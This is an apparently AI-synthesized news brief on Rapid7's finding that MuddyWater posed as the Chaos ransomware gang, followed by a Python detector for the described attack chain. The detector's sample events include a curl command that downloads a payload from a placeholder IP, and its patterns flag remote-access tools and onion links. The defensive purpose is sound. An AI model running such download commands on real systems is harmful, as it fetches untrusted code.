VYPR
breach · Published May 6, 2026 · Updated May 18, 2026 · 1 source

Iran's MuddyWater Masquerades as Chaos Ransomware Gang in Espionage Campaign

Rapid7 researchers have uncovered an Iranian state-sponsored espionage operation, attributed with medium confidence to MuddyWater, that posed as the Chaos ransomware gang to conceal a data theft and false-flag campaign.

Rapid7 researchers have identified an Iranian state-sponsored espionage operation that masqueraded as the Chaos ransomware gang to hide a data theft and false-flag campaign. The intrusion, detected earlier this year, is attributed with medium confidence to MuddyWater, a group linked to Iranian intelligence (MOIS) and previously tied to attacks on Western government and banking networks. The attack chain began with a Microsoft Teams phishing campaign, where attackers social-engineered victims into sharing their screens and entering credentials into local text files, even modifying MFA settings to allow attacker-controlled devices to complete authentication.

Once inside, the attackers deployed a remote management tool (AnyDesk) and used browser-based phishing pages, including a fake Microsoft Quick Assist page, to harvest additional credentials. With valid access in hand, they executed commands over RDP and used curl to download payloads: a backdoor named Darkcomp, a malicious loader built on Microsoft WebView2 that disguises its traffic, and an encrypted configuration file. They then moved laterally with the compromised accounts, collecting sensitive data along the way.

The attackers used the same compromised accounts to send internal emails notifying the organization's leadership of the intrusion and data theft, including an onion link to the Chaos ransomware data leak site (DLS), where a corresponding entry had appeared with the data hidden behind a countdown timer. Follow-up emails were meant to sustain the illusion of a genuine ransomware attack, telling recipients to look for a file containing 'access credentials' for ransom negotiations, but no such file existed. Unlike a typical ransomware operation, there was no file encryption, no way to contact the attackers, and no demand for payment.

Rapid7 believes the group did this as an extension of its false-flag operations, either to provide a plausible front for cyberespionage or as pre-positioning for potential destructive cyberattacks. The researchers noted that MuddyWater and Iranian intelligence have previously been linked to similar tactics, including an attack on an Israeli hospital that was falsely attributed to a Qilin affiliate. 'Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability,' the researchers wrote.

Masquerading as ransomware criminals offers two benefits: it muddies attribution by leaving ransomware breadcrumbs behind, and it redirects defensive effort toward hunting for signs of ransomware deployment (encryptors, ransom notes, leak-site entries) instead of the backdoors that underpin the espionage activity. The campaign shows state-sponsored actors blending espionage with false-flag operations to evade both detection and attribution.

Organizations are advised to remain vigilant against social engineering, particularly Teams-based lures and requests that lead to MFA changes (new authentication methods or devices registered for an account), and to monitor for unexpected remote-management tools, unusual lateral movement, and data exfiltration. The Rapid7 report is a reminder that not all ransomware incidents are financially motivated, and that defenders must look beyond surface-level indicators such as a leak-site entry or a ransom email to establish the true nature of an intrusion.
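Detection logic for the chain described above (an MFA change followed by a remote-management tool, a curl download from a bare IP, RDP logons, and an internal email carrying an onion link), plus a check for a ransom note that offers no way to pay or negotiate, as an added example that is not part of the original article or of Rapid7's research. The event schema, the sample events, the remote-tool watchlist, the 24-hour window, the 198.51.100.7 address and the onion hostname are all constructed or assumed for illustration.

```python
"""Correlate the post-compromise sequence described above over constructed events."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Assumed watchlist of remote-management tools; extend for your environment.
REMOTE_TOOLS = ("anydesk", "quickassist", "teamviewer")
ONION_RE = re.compile(r"https?://[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
IP_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
# Markers a genuine extortion note normally carries; their absence is the tell.
NEGOTIATION_RE = re.compile(
    r"\b(bitcoin|btc|monero|payment|pay|tox|qtox|contact us|session id)\b", re.IGNORECASE)

# Constructed sample events in a simplified, hypothetical schema (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2026-01-14T09:02:00", "user": "j.doe", "type": "mfa_method_added",
     "host": "WS-114", "detail": "Authenticator app registered from unrecognized device"},
    {"ts": "2026-01-14T09:20:00", "user": "j.doe", "type": "process_start",
     "host": "WS-114", "detail": r"C:\Users\j.doe\Downloads\AnyDesk.exe"},
    {"ts": "2026-01-14T10:05:00", "user": "j.doe", "type": "process_start",
     "host": "WS-114", "detail": r"curl.exe -o C:\Temp\update.bin http://198.51.100.7/update.bin"},
    {"ts": "2026-01-14T11:00:00", "user": "j.doe", "type": "rdp_logon",
     "host": "FS-01", "detail": "source=WS-114"},
    {"ts": "2026-01-15T08:00:00", "user": "j.doe", "type": "email_sent",
     "host": "EXCH-01", "detail": "To: ciso@corp.example Subject: Your data http://abcdefghijklmnop.onion/leak"},
    # Benign noise: an internal curl to a named host, and an MFA update with no follow-on activity.
    {"ts": "2026-01-14T12:00:00", "user": "a.smith", "type": "process_start",
     "host": "WS-220", "detail": "curl.exe https://intranet.corp.example/report.csv"},
    {"ts": "2026-01-13T15:00:00", "user": "b.lee", "type": "mfa_method_added",
     "host": "WS-300", "detail": "phone number updated"},
]


def classify(event):
    """Map one event to a stage label of the chain, or None if it is uninteresting."""
    detail = event["detail"]
    lowered = detail.lower()
    kind = event["type"]
    if kind == "mfa_method_added":
        return "mfa_change"
    if kind == "process_start" and any(tool in lowered for tool in REMOTE_TOOLS):
        return "remote_tool"
    if kind == "process_start" and "curl" in lowered and IP_URL_RE.search(lowered):
        return "curl_download_from_ip"
    if kind == "rdp_logon":
        return "rdp_logon"
    if kind == "email_sent" and ONION_RE.search(detail):
        return "onion_link_email"
    return None


def correlate(events, window_hours=24):
    """Return {user: sorted stage labels} for every user whose MFA change is
    followed within window_hours by at least two distinct later stages."""
    by_user = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        stage = classify(event)
        if stage:
            by_user[event["user"]].append((datetime.fromisoformat(event["ts"]), stage))
    findings = {}
    for user, stages in by_user.items():
        for start, stage in stages:
            if stage != "mfa_change":
                continue
            deadline = start + timedelta(hours=window_hours)
            later = {s for t, s in stages if start < t <= deadline and s != "mfa_change"}
            if len(later) >= 2:
                findings[user] = sorted(later)
                break
    return findings


def looks_like_false_flag_note(body):
    """True when a note points at a leak site but offers no way to pay or talk,
    the pattern the article describes; a real extortion note carries both."""
    return bool(ONION_RE.search(body)) and not NEGOTIATION_RE.search(body)


if __name__ == "__main__":
    for user, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{user}: MFA change followed by {', '.join(stages)}")
```

Requiring two distinct later stages keeps a lone MFA update (b.lee) and an ordinary internal curl (a.smith) out of the results; in a real deployment the stage labels would be fed by Entra audit logs, EDR process telemetry, Windows logon events and mail-flow logs rather than the constructed list above.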

Synthesized by Vypr AI